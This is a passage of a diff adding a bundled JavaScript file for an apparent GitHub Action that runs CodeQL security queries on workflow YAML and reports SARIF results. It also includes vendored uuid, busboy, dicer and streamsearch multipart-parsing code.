obj : { default: obj }; } + +function validate(uuid) { + return typeof uuid === 'string' && _regex.default.test(uuid); +} + +var _default = validate; +exports["default"] = _default; + +/***/ }), + +/***/ 1595: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function version(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + return parseInt(uuid.substr(14, 1), 16); +} + +var _default = version; +exports["default"] = _default; + +/***/ }), + +/***/ 950: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolcache = __importStar(__nccwpck_require__(7784)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newCodeQL() { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} +exports.newCodeQL = newCodeQL; +async function runCommand(config, args) { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function findCodeQL() { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; 
+ } + // default to the codeql in the path + return "codeql"; +} +async function findCodeQlInToolcache() { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + return path.join(candidate.folder, "codeql"); + } + core.warning(`No CodeQL tools found in toolcache.`); + return undefined; +} +async function downloadPack(codeql) { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } + catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} +exports.downloadPack = downloadPack; +async function codeqlDatabaseCreate(codeql) { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + return database_path; +} +exports.codeqlDatabaseCreate = codeqlDatabaseCreate; +async function codeqlDatabaseAnalyze(codeql, database_path) { + var codeql_output = codeql.output || "codeql-actions.sarif"; + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } + else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", 
codeql.pack); + } + cmd.push(database_path, suite); + await runCommand(codeql, cmd); + return codeql_output; +} +exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; + + +/***/ }), + +/***/ 6144: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.run = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const cql = __importStar(__nccwpck_require__(950)); +/** + * The main function for the action. + * @returns {Promise} Resolves when the action is complete. 
+ */ +async function run() { + try { + // set up codeql + var codeql = await cql.newCodeQL(); + core.debug(`CodeQL CLI found at '${codeql.path}'`); + await cql.runCommand(codeql, ["version", "--format", "terse"]); + // check yaml support + var languages = await cql.runCommandJson(codeql, [ + "resolve", + "languages", + "--format", + "json", + ]); + if (!languages.hasOwnProperty("yaml")) { + core.setFailed("CodeQL Yaml extractor not installed"); + throw new Error("CodeQL Yaml extractor not installed"); + } + // download pack + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } + else { + core.info(`Pack downloaded '${codeql.pack}'`); + } + core.info("Creating CodeQL database..."); + var database_path = await cql.codeqlDatabaseCreate(codeql); + core.info("Running CodeQL analysis..."); + var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); + core.info(`SARIF results: '${sarif}'`); + core.setOutput("sarif", sarif); + core.info("Finished CodeQL analysis"); + } + catch (error) { + // Fail the workflow run if an error occurs + if (error instanceof Error) + core.setFailed(error.message); + } +} +exports.run = run; +// eslint-disable-next-line @typescript-eslint/no-floating-promises +run(); + + +/***/ }), + +/***/ 9491: +/***/ ((module) => { + +"use strict"; +module.exports = require("assert"); + +/***/ }), + +/***/ 852: +/***/ ((module) => { + +"use strict"; +module.exports = require("async_hooks"); + +/***/ }), + +/***/ 4300: +/***/ ((module) => { + +"use strict"; +module.exports = require("buffer"); + +/***/ }), + +/***/ 2081: +/***/ ((module) => { + +"use strict"; +module.exports = require("child_process"); + +/***/ }), + +/***/ 6206: +/***/ ((module) => { + 
+"use strict"; +module.exports = require("console"); + +/***/ }), + +/***/ 6113: +/***/ ((module) => { + +"use strict"; +module.exports = require("crypto"); + +/***/ }), + +/***/ 7643: +/***/ ((module) => { + +"use strict"; +module.exports = require("diagnostics_channel"); + +/***/ }), + +/***/ 2361: +/***/ ((module) => { + +"use strict"; +module.exports = require("events"); + +/***/ }), + +/***/ 7147: +/***/ ((module) => { + +"use strict"; +module.exports = require("fs"); + +/***/ }), + +/***/ 3685: +/***/ ((module) => { + +"use strict"; +module.exports = require("http"); + +/***/ }), + +/***/ 5158: +/***/ ((module) => { + +"use strict"; +module.exports = require("http2"); + +/***/ }), + +/***/ 5687: +/***/ ((module) => { + +"use strict"; +module.exports = require("https"); + +/***/ }), + +/***/ 1808: +/***/ ((module) => { + +"use strict"; +module.exports = require("net"); + +/***/ }), + +/***/ 5673: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:events"); + +/***/ }), + +/***/ 4492: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:stream"); + +/***/ }), + +/***/ 7261: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:util"); + +/***/ }), + +/***/ 2037: +/***/ ((module) => { + +"use strict"; +module.exports = require("os"); + +/***/ }), + +/***/ 1017: +/***/ ((module) => { + +"use strict"; +module.exports = require("path"); + +/***/ }), + +/***/ 4074: +/***/ ((module) => { + +"use strict"; +module.exports = require("perf_hooks"); + +/***/ }), + +/***/ 3477: +/***/ ((module) => { + +"use strict"; +module.exports = require("querystring"); + +/***/ }), + +/***/ 2781: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream"); + +/***/ }), + +/***/ 5356: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream/web"); + +/***/ }), + +/***/ 1576: +/***/ ((module) => { + +"use strict"; +module.exports = require("string_decoder"); + +/***/ }), + +/***/ 9512: +/***/ ((module) 
=> { + +"use strict"; +module.exports = require("timers"); + +/***/ }), + +/***/ 4404: +/***/ ((module) => { + +"use strict"; +module.exports = require("tls"); + +/***/ }), + +/***/ 7310: +/***/ ((module) => { + +"use strict"; +module.exports = require("url"); + +/***/ }), + +/***/ 3837: +/***/ ((module) => { + +"use strict"; +module.exports = require("util"); + +/***/ }), + +/***/ 9830: +/***/ ((module) => { + +"use strict"; +module.exports = require("util/types"); + +/***/ }), + +/***/ 1267: +/***/ ((module) => { + +"use strict"; +module.exports = require("worker_threads"); + +/***/ }), + +/***/ 9796: +/***/ ((module) => { + +"use strict"; +module.exports = require("zlib"); + +/***/ }), + +/***/ 2960: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const inherits = (__nccwpck_require__(7261).inherits) + +const StreamSearch = __nccwpck_require__(1142) + +const PartStream = __nccwpck_require__(1620) +const HeaderParser = __nccwpck_require__(2032) + +const DASH = 45 +const B_ONEDASH = Buffer.from('-') +const B_CRLF = Buffer.from('\r\n') +const EMPTY_FN = function () {} + +function Dicer (cfg) { + if (!(this instanceof Dicer)) { return new Dicer(cfg) } + WritableStream.call(this, cfg) + + if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } + + if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } + + this._headerFirst = cfg.headerFirst + + this._dashes = 0 + this._parts = 0 + this._finished = false + this._realFinish = false + this._isPreamble = true + this._justMatched = false + this._firstWrite = true + this._inHeader = true + this._part = undefined + this._cb = undefined + this._ignoreData = false + this._partOpts = { highWaterMark: cfg.partHwm } + this._pause = false + + const self = this + this._hparser = new HeaderParser(cfg) + 
this._hparser.on('header', function (header) { + self._inHeader = false + self._part.emit('header', header) + }) +} +inherits(Dicer, WritableStream) + +Dicer.prototype.emit = function (ev) { + if (ev === 'finish' && !this._realFinish) { + if (!this._finished) { + const self = this + process.nextTick(function () { + self.emit('error', new Error('Unexpected end of multipart data')) + if (self._part && !self._ignoreData) { + const type = (self._isPreamble ? 'Preamble' : 'Part') + self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) + self._part.push(null) + process.nextTick(function () { + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + return + } + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + } + } else { WritableStream.prototype.emit.apply(this, arguments) } +} + +Dicer.prototype._write = function (data, encoding, cb) { + // ignore unexpected data (e.g. extra trailer data after finished) + if (!this._hparser && !this._bparser) { return cb() } + + if (this._headerFirst && this._isPreamble) { + if (!this._part) { + this._part = new PartStream(this._partOpts) + if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } + } + const r = this._hparser.push(data) + if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } + } + + // allows for "easier" testing + if (this._firstWrite) { + this._bparser.push(B_CRLF) + this._firstWrite = false + } + + this._bparser.push(data) + + if (this._pause) { this._cb = cb } else { cb() } +} + +Dicer.prototype.reset = function () { + this._part = undefined + this._bparser = undefined + this._hparser = undefined +} + +Dicer.prototype.setBoundary = function (boundary) { + const self = this + this._bparser = new StreamSearch('\r\n--' + boundary) + this._bparser.on('info', function (isMatch, data, start, end) { + self._oninfo(isMatch, data, start, 
end) + }) +} + +Dicer.prototype._ignore = function () { + if (this._part && !this._ignoreData) { + this._ignoreData = true + this._part.on('error', EMPTY_FN) + // we must perform some kind of read on the stream even though we are + // ignoring the data, otherwise node's Readable stream will not emit 'end' + // after pushing null to the stream + this._part.resume() + } +} + +Dicer.prototype._oninfo = function (isMatch, data, start, end) { + let buf; const self = this; let i = 0; let r; let shouldWriteMore = true + + if (!this._part && this._justMatched && data) { + while (this._dashes < 2 && (start + i) < end) { + if (data[start + i] === DASH) { + ++i + ++this._dashes + } else { + if (this._dashes) { buf = B_ONEDASH } + this._dashes = 0 + break + } + } + if (this._dashes === 2) { + if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } + this.reset() + this._finished = true + // no more parts will be added + if (self._parts === 0) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } + } + if (this._dashes) { return } + } + if (this._justMatched) { this._justMatched = false } + if (!this._part) { + this._part = new PartStream(this._partOpts) + this._part._read = function (n) { + self._unpause() + } + if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } + if (!this._isPreamble) { this._inHeader = true } + } + if (data && start < end && !this._ignoreData) { + if (this._isPreamble || !this._inHeader) { + if (buf) { shouldWriteMore = this._part.push(buf) } + shouldWriteMore = this._part.push(data.slice(start, end)) + if (!shouldWriteMore) { this._pause = true } + } else if (!this._isPreamble && this._inHeader) { + if (buf) { this._hparser.push(buf) } + r = this._hparser.push(data.slice(start, end)) + if (!this._inHeader && r !== undefined && r < end) { 
this._oninfo(false, data, start + r, end) } + } + } + if (isMatch) { + this._hparser.reset() + if (this._isPreamble) { this._isPreamble = false } else { + if (start !== end) { + ++this._parts + this._part.on('end', function () { + if (--self._parts === 0) { + if (self._finished) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } else { + self._unpause() + } + } + }) + } + } + this._part.push(null) + this._part = undefined + this._ignoreData = false + this._justMatched = true + this._dashes = 0 + } +} + +Dicer.prototype._unpause = function () { + if (!this._pause) { return } + + this._pause = false + if (this._cb) { + const cb = this._cb + this._cb = undefined + cb() + } +} + +module.exports = Dicer + + +/***/ }), + +/***/ 2032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) +const getLimit = __nccwpck_require__(1467) + +const StreamSearch = __nccwpck_require__(1142) + +const B_DCRLF = Buffer.from('\r\n\r\n') +const RE_CRLF = /\r\n/g +const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex + +function HeaderParser (cfg) { + EventEmitter.call(this) + + cfg = cfg || {} + const self = this + this.nread = 0 + this.maxed = false + this.npairs = 0 + this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) + this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) + this.buffer = '' + this.header = {} + this.finished = false + this.ss = new StreamSearch(B_DCRLF) + this.ss.on('info', function (isMatch, data, start, end) { + if (data && !self.maxed) { + if (self.nread + end - start >= self.maxHeaderSize) { + end = self.maxHeaderSize - self.nread + start + self.nread = self.maxHeaderSize + self.maxed = true + } else { self.nread += (end - start) } + + self.buffer += data.toString('binary', start, end) + } + if (isMatch) { self._finish() } + }) +} 
+inherits(HeaderParser, EventEmitter) + +HeaderParser.prototype.push = function (data) { + const r = this.ss.push(data) + if (this.finished) { return r } +} + +HeaderParser.prototype.reset = function () { + this.finished = false + this.buffer = '' + this.header = {} + this.ss.reset() +} + +HeaderParser.prototype._finish = function () { + if (this.buffer) { this._parseHeader() } + this.ss.matches = this.ss.maxMatches + const header = this.header + this.header = {} + this.buffer = '' + this.finished = true + this.nread = this.npairs = 0 + this.maxed = false + this.emit('header', header) +} + +HeaderParser.prototype._parseHeader = function () { + if (this.npairs === this.maxHeaderPairs) { return } + + const lines = this.buffer.split(RE_CRLF) + const len = lines.length + let m, h + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (lines[i].length === 0) { continue } + if (lines[i][0] === '\t' || lines[i][0] === ' ') { + // folded header content + // RFC2822 says to just remove the CRLF and not the whitespace following + // it, so we follow the RFC and include the leading whitespace ... 
+ if (h) { + this.header[h][this.header[h].length - 1] += lines[i] + continue + } + } + + const posColon = lines[i].indexOf(':') + if ( + posColon === -1 || + posColon === 0 + ) { + return + } + m = RE_HDR.exec(lines[i]) + h = m[1].toLowerCase() + this.header[h] = this.header[h] || [] + this.header[h].push((m[2] || '')) + if (++this.npairs === this.maxHeaderPairs) { break } + } +} + +module.exports = HeaderParser + + +/***/ }), + +/***/ 1620: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const inherits = (__nccwpck_require__(7261).inherits) +const ReadableStream = (__nccwpck_require__(4492).Readable) + +function PartStream (opts) { + ReadableStream.call(this, opts) +} +inherits(PartStream, ReadableStream) + +PartStream.prototype._read = function (n) {} + +module.exports = PartStream + + +/***/ }), + +/***/ 1142: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/** + * Copyright Brian White. All rights reserved. + * + * @see https://github.com/mscdex/streamsearch + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + * + * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation + * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool + */ +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) + +function SBMH (needle) { + if (typeof needle === 'string') { + needle = Buffer.from(needle) + } + + if (!Buffer.isBuffer(needle)) { + throw new TypeError('The needle has to be a String or a Buffer.') + } + + const needleLength = needle.length + + if (needleLength === 0) { + throw new Error('The needle cannot be an empty String/Buffer.') + } + + if (needleLength > 256) { + throw new Error('The needle cannot have a length bigger than 256.') + } + + this.maxMatches = Infinity + this.matches = 0 + + this._occ = new Array(256) + .fill(needleLength) // Initialize occurrence table. + this._lookbehind_size = 0 + this._needle = needle + this._bufpos = 0 + + this._lookbehind = Buffer.alloc(needleLength) + + // Populate occurrence table with analysis of the needle, + // ignoring last letter. 
+ for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var + this._occ[needle[i]] = needleLength - 1 - i + } +} +inherits(SBMH, EventEmitter) + +SBMH.prototype.reset = function () { + this._lookbehind_size = 0 + this.matches = 0 + this._bufpos = 0 +} + +SBMH.prototype.push = function (chunk, pos) { + if (!Buffer.isBuffer(chunk)) { + chunk = Buffer.from(chunk, 'binary') + } + const chlen = chunk.length + this._bufpos = pos || 0 + let r + while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } + return r +} + +SBMH.prototype._sbmh_feed = function (data) { + const len = data.length + const needle = this._needle + const needleLength = needle.length + const lastNeedleChar = needle[needleLength - 1] + + // Positive: points to a position in `data` + // pos == 3 points to data[3] + // Negative: points to a position in the lookbehind buffer + // pos == -2 points to lookbehind[lookbehind_size - 2] + let pos = -this._lookbehind_size + let ch + + if (pos < 0) { + // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool + // search with character lookup code that considers both the + // lookbehind buffer and the current round's haystack data. + // + // Loop until + // there is a match. + // or until + // we've moved past the position that requires the + // lookbehind buffer. In this case we switch to the + // optimized loop. + // or until + // the character to look at lies outside the haystack. + while (pos < 0 && pos <= len - needleLength) { + ch = this._sbmh_lookup_char(data, pos + needleLength - 1) + + if ( + ch === lastNeedleChar && + this._sbmh_memcmp(data, pos, needleLength - 1) + ) { + this._lookbehind_size = 0 + ++this.matches + this.emit('info', true) + + return (this._bufpos = pos + needleLength) + } + pos += this._occ[ch] + } + + // No match. + + if (pos < 0) { + // There's too few data for Boyer-Moore-Horspool to run, + // so let's use a different algorithm to skip as much as + // we can. 
+ // Forward pos until + // the trailing part of lookbehind + data + // looks like the beginning of the needle + // or until + // pos == 0 + while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } + } + + if (pos >= 0) { + // Discard lookbehind buffer. + this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) + this._lookbehind_size = 0 + } else { + // Cut off part of the lookbehind buffer that has + // been processed and append the entire haystack + // into it. + const bytesToCutOff = this._lookbehind_size + pos + if (bytesToCutOff > 0) { + // The cut off data is guaranteed not to contain the needle. + this.emit('info', false, this._lookbehind, 0, bytesToCutOff) + } + + this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, + this._lookbehind_size - bytesToCutOff) + this._lookbehind_size -= bytesToCutOff + + data.copy(this._lookbehind, this._lookbehind_size) + this._lookbehind_size += len + + this._bufpos = len + return len + } + } + + pos += (pos >= 0) * this._bufpos + + // Lookbehind buffer is now empty. We only need to check if the + // needle is in the haystack. + if (data.indexOf(needle, pos) !== -1) { + pos = data.indexOf(needle, pos) + ++this.matches + if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } + + return (this._bufpos = pos + needleLength) + } else { + pos = len - needleLength + } + + // There was no match. If there's trailing haystack data that we cannot + // match yet using the Boyer-Moore-Horspool algorithm (because the trailing + // data is less than the needle size) then match using a modified + // algorithm that starts matching from the beginning instead of the end. + // Whatever trailing data is left after running this algorithm is added to + // the lookbehind buffer. 
+ while ( + pos < len && + ( + data[pos] !== needle[0] || + ( + (Buffer.compare( + data.subarray(pos, pos + len - pos), + needle.subarray(0, len - pos) + ) !== 0) + ) + ) + ) { + ++pos + } + if (pos < len) { + data.copy(this._lookbehind, 0, pos, pos + (len - pos)) + this._lookbehind_size = len - pos + } + + // Everything until pos is guaranteed not to contain needle data. + if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } + + this._bufpos = len + return len +} + +SBMH.prototype._sbmh_lookup_char = function (data, pos) { + return (pos < 0) + ? this._lookbehind[this._lookbehind_size + pos] + : data[pos] +} + +SBMH.prototype._sbmh_memcmp = function (data, pos, len) { + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } + } + return true +} + +module.exports = SBMH + + +/***/ }), + +/***/ 727: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const { inherits } = __nccwpck_require__(7261) +const Dicer = __nccwpck_require__(2960) + +const MultipartParser = __nccwpck_require__(2183) +const UrlencodedParser = __nccwpck_require__(8306) +const parseParams = __nccwpck_require__(1854) + +function Busboy (opts) { + if (!(this instanceof Busboy)) { return new Busboy(opts) } + + if (typeof opts !== 'object') { + throw new TypeError('Busboy expected an options-Object.') + } + if (typeof opts.headers !== 'object') { + throw new TypeError('Busboy expected an options-Object with headers-attribute.') + } + if (typeof opts.headers['content-type'] !== 'string') { + throw new TypeError('Missing Content-Type-header.') + } + + const { + headers, + ...streamOptions + } = opts + + this.opts = { + autoDestroy: false, + ...streamOptions + } + WritableStream.call(this, this.opts) + + this._done = false + this._parser = this.getParserByHeaders(headers) + 
this._finished = false +} +inherits(Busboy, WritableStream) + +Busboy.prototype.emit = function (ev) { + if (ev === 'finish') { + if (!this._done) { + this._parser?.end() + return + } else if (this._finished) { + return + } + this._finished = true + } + WritableStream.prototype.emit.apply(this, arguments) +} + +Busboy.prototype.getParserByHeaders = function (headers) { + const parsed = parseParams(headers['content-type']) + + const cfg = { + defCharset: this.opts.defCharset, + fileHwm: this.opts.fileHwm, + headers, + highWaterMark: this.opts.highWaterMark, + isPartAFile: this.opts.isPartAFile, + limits: this.opts.limits, + parsedConType: parsed, + preservePath: this.opts.preservePath + } + + if (MultipartParser.detect.test(parsed[0])) { + return new MultipartParser(this, cfg) + } + if (UrlencodedParser.detect.test(parsed[0])) { + return new UrlencodedParser(this, cfg) + } + throw new Error('Unsupported Content-Type.') +} + +Busboy.prototype._write = function (chunk, encoding, cb) { + this._parser.write(chunk, cb) +} + +module.exports = Busboy +module.exports["default"] = Busboy +module.exports.Busboy = Busboy + +module.exports.Dicer = Dicer + + +/***/ }), + +/***/ 2183: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// TODO: +// * support 1 nested multipart level +// (see second multipart example here: +// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) +// * support limits.fieldNameSize +// -- this will require modifications to utils.parseParams + +const { Readable } = __nccwpck_require__(4492) +const { inherits } = __nccwpck_require__(7261) + +const Dicer = __nccwpck_require__(2960) + +const parseParams = __nccwpck_require__(1854) +const decodeText = __nccwpck_require__(4619) +const basename = __nccwpck_require__(8647) +const getLimit = __nccwpck_require__(1467) + +const RE_BOUNDARY = /^boundary$/i +const RE_FIELD = /^form-data$/i +const RE_CHARSET = /^charset$/i +const RE_FILENAME = 
/^filename$/i +const RE_NAME = /^name$/i + +Multipart.detect = /^multipart\/form-data/i +function Multipart (boy, cfg) { + let i + let len + const self = this + let boundary + const limits = cfg.limits + const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) + const parsedConType = cfg.parsedConType || [] + const defCharset = cfg.defCharset || 'utf8' + const preservePath = cfg.preservePath + const fileOpts = { highWaterMark: cfg.fileHwm } + + for (i = 0, len = parsedConType.length; i < len; ++i) { + if (Array.isArray(parsedConType[i]) && + RE_BOUNDARY.test(parsedConType[i][0])) { + boundary = parsedConType[i][1] + break + } + } + + function checkFinished () { + if (nends === 0 && finished && !boy._done) { + finished = false + self.end() + } + } + + if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } + + const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) + const filesLimit = getLimit(limits, 'files', Infinity) + const fieldsLimit = getLimit(limits, 'fields', Infinity) + const partsLimit = getLimit(limits, 'parts', Infinity) + const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) + const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) + + let nfiles = 0 + let nfields = 0 + let nends = 0 + let curFile + let curField + let finished = false + + this._needDrain = false + this._pause = false + this._cb = undefined + this._nparts = 0 + this._boy = boy + + const parserCfg = { + boundary, + maxHeaderPairs: headerPairsLimit, + maxHeaderSize: headerSizeLimit, + partHwm: fileOpts.highWaterMark, + highWaterMark: cfg.highWaterMark + } + + this.parser = new Dicer(parserCfg) + this.parser.on('drain', function () { + self._needDrain = false + if (self._cb && !self._pause) { + const cb = self._cb + self._cb = undefined + cb() + } + }).on('part', function 
onPart (part) { + if (++self._nparts > partsLimit) { + self.parser.removeListener('part', onPart) + self.parser.on('part', skipPart) + boy.hitPartsLimit = true + boy.emit('partsLimit') + return skipPart(part) + } + + // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let + // us emit 'end' early since we know the part has ended if we are already + // seeing the next part + if (curField) { + const field = curField + field.emit('end') + field.removeAllListeners('end') + } + + part.on('header', function (header) { + let contype + let fieldname + let parsed + let charset + let encoding + let filename + let nsize = 0 + + if (header['content-type']) { + parsed = parseParams(header['content-type'][0]) + if (parsed[0]) { + contype = parsed[0].toLowerCase() + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_CHARSET.test(parsed[i][0])) { + charset = parsed[i][1].toLowerCase() + break + } + } + } + } + + if (contype === undefined) { contype = 'text/plain' } + if (charset === undefined) { charset = defCharset } + + if (header['content-disposition']) { + parsed = parseParams(header['content-disposition'][0]) + if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_NAME.test(parsed[i][0])) { + fieldname = parsed[i][1] + } else if (RE_FILENAME.test(parsed[i][0])) { 